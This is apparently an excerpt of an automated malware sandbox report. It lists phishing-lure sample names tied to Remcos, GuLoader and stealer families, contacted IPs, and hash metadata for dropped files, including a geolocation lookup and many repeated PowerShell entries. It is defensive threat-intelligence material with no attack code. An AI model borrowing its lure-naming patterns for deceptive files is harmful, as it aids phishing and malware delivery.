                                                                                                Salary_Increase_Approval_Open_Enrollment_202417918.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.25.14
                                                                                                http://manatoki463.netGet hashmaliciousUnknownBrowse
                                                                                                • 141.101.120.10
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 172.67.206.204
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 104.21.53.8
                                                                                                https://na2.docusign.net/Signing/EmailStart.aspx?a=52f7eab1-67dd-4b2c-9342-8cf1837ca85b&etti=24&acct=8327544d-e5d8-4fb1-8036-f62a8723beb9&er=1f6c0370-0bf0-4639-942a-0c529236b3c5Get hashmaliciousHtmlDropperBrowse
                                                                                                • 188.114.97.3
                                                                                                ATOM86-ASATOM86NLceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                • 85.222.236.220
                                                                                                DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                                • 178.237.33.50
                                                                                                lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                                • 178.237.33.50
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://doc.tayato.com/mo6/?top=uwe.geiersbach@bbraun.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                http://linternasdelmar.com/RDGHEVGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                MDE_File_Sample_c30bdf9dd71e806fd1e0e834647bce524afa781f.zipGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                (No subject) (90).emlGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                DHL.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                DHL_Shipping_Invoices_Awb_BL_000000000102120242247820020031808174Global180030010212024.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.20.4.235
                                                                                                • 188.114.96.3
                                                                                                No context
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type: JSON data
Category: dropped
Size (bytes): 957
Entropy (8bit): 5.009232287567204
Encrypted: false
SSDEEP: 24:qsdRNuKyGX85jHf3SvXhNlT3/7YvfbYro:xPN0GX85mvhjTkvfEro
MD5: 759439A00540A5351C6ED1D4E86C08CC
SHA1: B3C8DC85717DA6D27CF8A3F2533216BD9DA8DD0F
SHA-256: 457CC36B09721B31358CCB09F7822FBBF3CB120FA03349642814CB0A9B107126
SHA-512: 90F41E51A1BA10CE2D3DF77A34FF108BADA8AD3B983689726FC9911796CE735A5650233BD32F0CB2C86B894908E313405FD8DDA00E64C7127958CE9C164EC3A8
Malicious: false
Preview:
{
 "geoplugin_request":"173.254.250.76",
 "geoplugin_status":200,
 "geoplugin_delay":"1ms",
 "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
 "geoplugin_city":"Killeen",
 "geoplugin_region":"Texas",
 "geoplugin_regionCode":"TX",
 "geoplugin_regionName":"Texas",
 "geoplugin_areaCode":"",
 "geoplugin_dmaCode":"625",
 "geoplugin_countryCode":"US",
 "geoplugin_countryName":"United States",
 "geoplugin_inEU":0,
 "geoplugin_euVATrate":false,
 "geoplugin_continentCode":"NA",
 "geoplugin_continentName":"North America",
 "geoplugin_latitude":"31.0065",
 "geoplugin_longitude":"-97.8406",
 "geoplugin_locationAccuracyRadius":"20",
 "geoplugin_timezone":"America\/Chicago",
 "geoplugin_currencyCode":"USD",
 "geoplugin_currencySymbol":"$",
 "geoplugin_currencySymbol_UTF8":"$",
 "geoplugin_currencyConverter":0
}
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 9434
Entropy (8bit): 4.928515784730612
Encrypted: false
SSDEEP: 192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5: D3594118838EF8580975DDA877E44DEB
SHA1: 0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256: 456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512: 103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious: false
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6da2561b, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):20447232
                                                                                                Entropy (8bit):1.2827249890477794
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:UZSwFSo74KaOfvUDF2j+qW5cLvF5HVwXWF:2S1NDS+
                                                                                                MD5:69F8EC5752113AB15524AC7E543C7C2C
                                                                                                SHA1:3083075A45A1604212EF50E31EC2D0BD984C377F
                                                                                                SHA-256:79164957B2A958D6B595B3D68F6983D87B03E3B6ECB5C384780EC28A56ABBD4C
                                                                                                SHA-512:F92A908AA7CCC7A1FF2B089A895EC903080377C8EAD8A286AD523A8B8221CFA4764A179FE2CA9EB7D3E8CC7DA7F06032F969442840526FED7B652DC9DF207558
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):2
                                                                                                Entropy (8bit):1.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Qn:Qn
                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                Malicious:false
                                                                                                Preview:..
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7304049989621277
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:5nxm33CxH5GkvhkvCCty14lTFHp14lTeH8:VxmyZSyeZeR
                                                                                                MD5:0E567C6FEC650E915360D782F5859EEA
                                                                                                SHA1:97D704E85604B7563BD62A12521C1194F358A7CA
